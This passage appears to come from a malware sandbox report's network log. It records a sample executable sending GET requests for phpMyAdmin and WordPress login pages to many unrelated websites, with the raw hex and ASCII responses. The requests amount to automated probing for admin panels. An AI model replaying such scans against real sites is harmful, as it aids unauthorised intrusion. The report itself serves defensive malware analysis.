                                                                                                                                                                                                    Data Raw: 63 38 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 33 0d 0a 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 0d 0a 33 38 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 33 0d 0a 25 35 62 6e 6f 25 32 30 61 64 64 72 65 73 73 25 32 30 67 69 76 65 6e 25 35 64 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 0d 0a 31 62 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0a 3c 70 3e 0a 0d 0a 33 39 0d 0a 0a 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 0a 20 20 0d 0a 35 37 0d 0a 0a 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 0a 0a 20 20 0d 0a 32 0d 0a 0a 0a 0d 0a 39 0d 0a 3c 2f 70 3e 0a 3c 70 3e 0a 0d 0a 34 38 0d 0a 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 0a 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 32 62 0d 0a 25 35 62 6e 6f 25 32 30 61 64 64 72 65 73 73 25 32 30 67 69 76 65 6e 25 35 64 22 3e 77 65 62 6d 61 73 74 65 72 3c 2f 61 3e 2e 0a 0d 0a 31 31 0d 0a 0a 3c 2f 70 3e 0a 0a 3c 68 32 3e 45 72 72 6f 72 20 0d 0a 32 31 0d 0a 34 30 34 3c 2f 68 32 3e 0a 3c 61 64 64 72 65 73 73 3e 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 32 39 0d 0a 63 6f 72 61 6c 70 61 72 6b 63 68 72 69 73 74 69 61 6e 2e 6f 72 67 3c 2f 61 3e 3c 62 72 20 2f 3e 0a 20 20 3c 73 70 61 6e 3e 0d 0a 32 39 0d 0a 41 70
                                                                                                                                                                                                    Data Ascii: c8<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="13en"><head><title>38Object not found!</title><link rev="made" href="mailto:113%5bno%20address%20given%5d" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p, address {margin-left: 3em;} span {font-size: smaller;}/*...*/--></style></head><body><h1>1bObject not found!</h1><p>39 The requested URL was not found on this server. 57 If you entered the URL manually please check your spelling and try again. 29</p><p>48If you think this is a server error, please contactthe <a href="mailto:2b%5bno%20address%20given%5d">webmaster</a>.11</p><h2>Error 21404</h2><address> <a href="/">29coralparkchristian.org</a><br /> <span>29Ap
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.201001883 CET106INData Raw: 61 63 68 65 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 31 0d 0a 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: ache</span></address></body></html>10


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    95192.168.2.45638715.235.14.141806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.043378115 CET226OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: unaj.edu.pe
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.149755001 CET273INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Content-Length: 239
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Location: https://unaj.edu.pe/phpmyadmin/
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.149768114 CET293INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://unaj.edu.pe/phpmyadmin/">here</a>.</p></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    96192.168.2.456288139.162.169.45806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.082813978 CET232OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: hmichaelandco.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.910742044 CET1340INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                    x-powered-by: PHP/7.4.33
                                                                                                                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                                                                                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                    link: <http://hmichaelandco.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                    transfer-encoding: chunked
                                                                                                                                                                                                    content-encoding: gzip
                                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                                    date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                                    Data Raw: 32 66 39 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 6b 73 e3 36 b2 e8 67 b9 ea fc 07 0c 9d 58 d2 2c 49 51 2f 3f 64 cb 39 93 d9 64 93 53 c9 26 37 93 9c ad 5b 93 39 2a 88 84 24 cc 50 04 97 80 64 7b 3d fe 41 f7 6f dc 5f 76 ab f1 20 41 8a 7a f8 91 9c f3 e1 2a 95 31 09 02 dd 8d 46 a3 d1 00 ba 81 ab 57 11 0b c5 5d 4a d0 42 2c e3 eb a3 2b f8 83 62 9c cc c7 0e 49 bc df de 39 47 8d 34 23 33 7a 3b 76 d8 7c 84 16 42 a4 7c d4 e9 b0 79 ea 2f 49 27 e1 c7 0e 82 52 04 47 d7 47 57 4b 22 b0 cc e2 91 7f ae e8 7a ec bc 65 89 20 89 f0 7e bd 4b 89 83 42 f5 36 76 04 b9 15 1d c0 74 89 c2 05 ce 38 11 e3 df 7e fd d6 3b 77 50 e7 fa e8 e8 ea 95 e7 a1 1f d9 94 c6 04 bd 4b 49 48 67 34 44 3f 12 81 39 3a 41 df e2 35 0d 59 c2 91 e7 19 84 09 5e 92 b1 b3 a6 e4 26 65 99 b0 d0 dc d0 48 2c c6 11 59 d3 90 78 f2 c5 45 34 a1 82 e2 d8 e3 21 8e c9 b8 eb a2 25 be a5 cb d5 b2 48 58 71 92 c9 37 3c 8d c9 38 70 ae af 62 9a 7c 42 19 89 c7 0e 5f b0 4c 84 2b 81 80 06 07 2d 32 32 1b 3b c0 93 51 a7 b3 58 d2 70 81 49 8c 93 28 64 7e c8 96 9d 9b d4 d3 55 ee ac d2 98 e1 88 77 7a 41 2f e8 04 a7 79 66 3f 4d e6 25 0c 38 4d 63 e2 09 b6 0a 17 de 9f 88 84 d3 7f 11 3e 76 ba bd e0 b6 db 0b fe a4 9a 69 a4 67 a7 b7 67 a7 7f 2e ca ee b0 77 db 1d f6 5e 10 29 c8 ec 3f 58 16 fd 9c 11 ce d1 3b b1 9a cd a4 88 a2 2d bf 2b 1e 66 34 15 d7 47 5b be cb e4 ce 6b f4 bf d9 0a 85 38 41 38 8a d0 92 65 04 3a d1 8c ce 57 19 16 94 25 88 a5 f0 87 23 c1 d0 0d 99 ce 58 22 40 ce 48 86 a6 77 28 cd c8 9a b2 15 8f ef 50 44 66 34 a1 c9 1c 89 05 41 ff 20 d3 6f 59 22 de 4a 40 e8 86 8a 05 ba 63 ab 2c 87 f5 ba b3 93 28 3a 43 2d 04 2a 83 cd 2a a0 c6 e3 31 72 56 89 44 46 22 07 b5 d1 fd 4e 48 50 c7 32 31 63 94 90 1b f4 d3 f4 23 09 45 ab 7d b9 b3 f4 c3 ce af 25 b8 ef 9b 73 c6 e6 31 69 7e 40 63 74 3f c3 4b 1a 53 c2 47 e8 7d f3 47 96 08 4e b2 0c 8b 51 37 08 dc 5e 10 b8 fd 20 70 07 41 e0 0e 83 c0 3d 0d 02 f7 2c 08 dc f3 20 70 2f 82 c0 ed 06 01 15 38 a6 21 e4 d4 4f fd fc 69 90 3f 0d f3 a7 d3 fc e9 2c 7f 3a cf 9f 2e cc 53 d3 45 cd 9f 52 92 fc e5 1d 4e f8 c8 90 60 a3 af 43 b3 13 f8 09 5f 4d 41 b3 c6 58 d0 a4 f9 e1 e1 f2 68 27 c3 5a b3 55 12 82 30 b5 0e 69 b6 35 ce d0 cd 0c 8d 51 c4 c2 d5 92 24 c2 0f 33 82 05 f9 26 26 f0 d6 42 4d 25 df 4d b4 a7 15 41 06 6e 66 3e cf 42 34 46 4d 33 bc e0 8f f8 d6 57 6d 86 53 ca a5 36 85 b4 4e 4c a7 bc a3 25 bd d3 f5 87 7e df bc f9 1f 79 73 b7 c0 68 54 72 b4 1b a3 a6 1c 84 3e e2 35 d6 94 1e 54 18 f3 bb 44 52 2a b2 15 39 00 1f f0 89 db 6c 9a 13 a1 79 c4 bf be fb 15 cf ff 8e 97 c4 e6 d6 fb e0 c3 7e 42 b8 9f e2 8c 24 e2 ef 2c 22 3e 4d 38 c9 c4 d7 64 c6 32 d2 42 37 33
                                                                                                                                                                                                    Data Ascii: 2f91}ks6gX,IQ/?d9dS&7[9*$Pd{=Ao_v Az*1FW]JB,+bI9G4#3z;v|B|y/I'RGGWK"ze ~KB6vt8~;wPKIHg4D?9:A5Y^&eH,YxE4!%HXq7<8pb|B_L+-22;QXpI(d~UwzA/yf?M%8Mc>vigg.w^)?X;-+f4G[k8A8e:W%#X"@Hw(PDf4A oY"J@c,(:C-**1rVDF"NHP21c#E}%s1i~@ct?KSG}GNQ7^ pA=, p/8!Oi?,:.SERN`C_MAXh'ZU0i5Q$3&&BM%MAnf>B4FM3WmS6NL%~yshTr>5TDR*9ly~B$,">M8d2B73
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.910756111 CET1340INData Raw: 17 f1 7d 4c 7f 68 ef ea 5c 57 9d 7d ba e9 a8 d1 90 83 f4 9b 38 46 34 41 3f 25 04 bd fb e6 27 34 f0 03 bf 7b 0e 6a ef df 20 87 a0 22 26 d7 3f e3 39 41 09 13 68 c6 56 49 84 3e 23 f4 dd 8f 6a a0 44 27 78 99 5e a2 b7 cc bf ea a8 bc 50 4a da 10 6a 48
                                                                                                                                                                                                    Data Ascii: }Lh\W}8F4A?%'4{j "&?9AhVI>#jD'x^PJjHnIDn5,',!*t.pIGDDhQpgFK Yq;0PN_nd&/Ib[:t1#$R5(xa:wIC9G74?I}
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.910797119 CET1340INData Raw: 64 02 0c 61 0f c7 74 9e 8c 90 17 f8 1b 90 41 84 e7 19 58 e3 75 04 a5 38 8a 60 84 41 41 89 9e 07 60 1e f0 ec fa c8 b2 bc 9b 32 89 2f 08 11 4d 44 a3 71 f3 26 f5 a6 31 0b 3f 79 31 9d 66 38 bb f3 42 ce 9b 48 9b cc bb 16 ca 8c 55 d4 09 39 ef 44 94 8b
                                                                                                                                                                                                    Data Ascii: datAXu8`AA`2/MDq&1?y1f8BHU9DN-[QS5I\KQ<n85I"qOV`^4XvB;No$-Yuc6Y.ZAXE^MYtwy71N,fMc~@.kw87'
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.910845995 CET1340INData Raw: 2e 7b 3e c2 c3 75 d8 53 70 3d 45 77 3d 01 cf 13 74 d6 13 b0 3c 5e 57 3d 01 c9 63 75 d4 93 51 6c d5 4d 15 0a 8a 65 48 6d fc e5 eb b7 85 7e b4 4c 9d 3a 05 90 97 d8 b7 d8 5c 27 f7 15 11 2a c8 29 86 a8 7c 6d da b2 2a 0e 26 e9 90 45 e8 3a ba ca 4b b6
                                                                                                                                                                                                    Data Ascii: .{>uSp=Ew=t<^W=cuQlMeHm~L:\'*)|m*&E:Kz<i?5/I^Xs~Qv)YtB,4K/rx,T%H5kBSQ^~2\fIYXrW:E5B5jr5 eG]F~8
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.910859108 CET1340INData Raw: d3 97 84 a6 9a 56 41 f4 e4 81 14 77 23 75 02 84 94 dd e6 3e e1 05 01 41 d8 45 8b 9e fc b7 2f ff 1d c8 7f 87 f2 df 53 84 91 06 7f 23 03 6f 21 6c 69 41 32 2a 72 c9 cf df 15 b0 d1 82 ad 49 a6 40 e6 cf 7d 84 f3 e7 81 f5 3c b4 9e 4f 8b 67 9d 59 4a 6f
                                                                                                                                                                                                    Data Ascii: VAw#u>AE/S#o!liA2*rI@}<OgYJosM[yh=s GOt%$pOboXU(FRfKV eqF@ePRH71Ah;hA&$DL!5V/]+w_Z
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.910871029 CET1340INData Raw: 1d 7e 02 16 fa 1c 9e b6 34 a6 e4 f8 af 70 3e ec 14 67 5c 66 97 7b 1d b0 aa f9 c2 3b 1f fa 40 20 e8 f8 b3 55 1c 4b 34 55 aa 2e 66 17 b3 8b 4b 33 2d 30 c2 01 56 96 3c ce cb 12 b2 e3 29 1c 71 16 66 ab e5 94 97 e5 0b e2 c2 01 89 95 c1 2d bd bd c4 1c
                                                                                                                                                                                                    Data Ascii: ~4p>g\f{;@ UK4U.fK3-0V<)qf-BxZ1+-;$ Vo?v|E%2UH{a\*MI'^8u2>LUXyeVL=nY++?\*$)`>",4&PG89i
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.910883904 CET1340INData Raw: 11 fa aa 2a d4 c6 f9 16 eb 30 f5 c1 e9 bf 98 6d 17 8a c3 c2 9a 67 d2 38 dc 6a 82 9e 75 d6 16 36 0d 3e 89 29 17 7a 20 43 55 22 ab cd a7 c6 bb 49 8c ef 48 46 22 a3 81 c2 05 e3 e0 46 59 56 f6 15 9d 66 4b 81 06 63 26 77 70 03 d3 9c 65 94 70 8b 6d c6
                                                                                                                                                                                                    Data Ascii: *0mg8ju6>)z CU"IHF"FYVfKc&wpepm06j(u{K9X[Utw)'IPvL8cl]%4xkpS,dRbjf=h+#opv%}rST~$8\HoE&Lx
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.910924911 CET1340INData Raw: ae 19 02 c3 0e c9 0b fc 48 06 47 a1 a1 fc 8c 06 1f 2e 25 87 4b d1 df d3 19 8a 05 41 df 7f 83 2e 3e 5c 5b c7 4b a8 43 ec e0 04 31 73 ba 04 d8 01 70 72 d5 de 73 2b 6e 60 57 59 ce b4 3b e6 b6 c1 9a 03 3e e0 e6 c4 75 38 89 05 99 50 72 01 66 27 9c d7
                                                                                                                                                                                                    Data Ascii: HG.%KA.>\[KC1sprs+n`WY;>u8Prf' :vTs}=I":ym{Nr~OA (Wxf$Q|t-e*(d\9Iv`g8$:>N+qr7xGE K+/jR-m0Vvr
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.910937071 CET1340INData Raw: 41 29 1a 78 3c ca f5 4c e3 48 99 4e 24 03 e3 09 ec 18 50 38 a5 38 d9 a2 65 54 e0 7a 6e 9b 80 51 60 2b ba 92 21 52 fa 52 6b 71 54 b1 49 3b c3 58 44 ff df e8 28 d6 26 76 9a 47 2f 3d 8a db 12 94 eb fe 63 c7 16 8b 62 04 84 b8 6f 30 f6 4c ab cd 30 9a
                                                                                                                                                                                                    Data Ascii: A)x<LHN$P88eTznQ`+!RRkqTI;XD(&vG/=cbo0L0abgR62l93q0["6Xm/H/IFe$;?CJVK[t+,;WP0H+NRsq"cAiC`=v
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.910948992 CET1106INData Raw: 5e 97 c5 8b 27 bb 6d f3 fb 97 f2 7c 7f 10 99 3b d8 57 a0 56 9e 7e 35 1c ac 66 f9 f3 89 4c 33 22 c4 dd cf 0b 26 98 ff 91 db ad ab be a4 f0 e5 cf 27 8b 72 26 58 4a fc f4 d3 3c aa e1 9b fe fc e7 d3 65 4c 4d b0 40 6c 66 e5 e9 ff 0d 24 c5 e4 56 39 8a
                                                                                                                                                                                                    Data Ascii: ^'m|;WV~5fL3"&'r&XJ<eLM@lf$V90b?0q*?UNGMfDw4EfEFC\F"6HM*Sv&kdSBj&,[w'vf8D~4wA6F*Nh7s


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    97192.168.2.456378178.32.41.233806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.082983971 CET235OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: rochester-gauges.be
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.251671076 CET546INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Content-Type: text/html; charset=us-ascii
                                                                                                                                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:55:03 GMT
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Content-Length: 315
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    98192.168.2.456442162.210.96.117806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.091429949 CET238OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: coralparkchristian.org
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.928236008 CET551INHTTP/1.1 302 Found
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                    X-Redirect-By: WordPress
                                                                                                                                                                                                    Set-Cookie: PHPSESSID=25spuedk1v8jkqk9dcaj8tnufu; path=/
                                                                                                                                                                                                    Set-Cookie: wr-cf-list_email_send_to=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0
                                                                                                                                                                                                    Location: https://coralparkchristian.org/wp-login.php
                                                                                                                                                                                                    Vary: User-Agent
                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    99192.168.2.456410162.144.64.233806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.184113026 CET228OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: tcetmumbai.in
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.369997025 CET493INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                                    Location: https://tcetmumbai.in/phpmyadmin/
                                                                                                                                                                                                    Content-Length: 241
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 63 65 74 6d 75 6d 62 61 69 2e 69 6e 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://tcetmumbai.in/phpmyadmin/">here</a>.</p></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    100192.168.2.4565503.33.130.190806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.184214115 CET226OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: gmailvz.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.521661997 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: openresty
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Content-Length: 1177
                                                                                                                                                                                                    Last-Modified: Mon, 13 Nov 2023 23:36:19 GMT
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    ETag: "6552b2f3-499"
                                                                                                                                                                                                    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_ZCTCHaPnoiDYrNNKnLW0UwFSnp9gyMAUgtHq3X8KuXvCkQrj7ddiSk1fqax6yQxO4mQKEGGwBFEvrnxnkaiSIQ
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                    Set-Cookie: caf_ipaddr=10.119.144.22;Path=/;Max-Age=86400;
                                                                                                                                                                                                    Set-Cookie: country=;Path=/;Max-Age=86400;
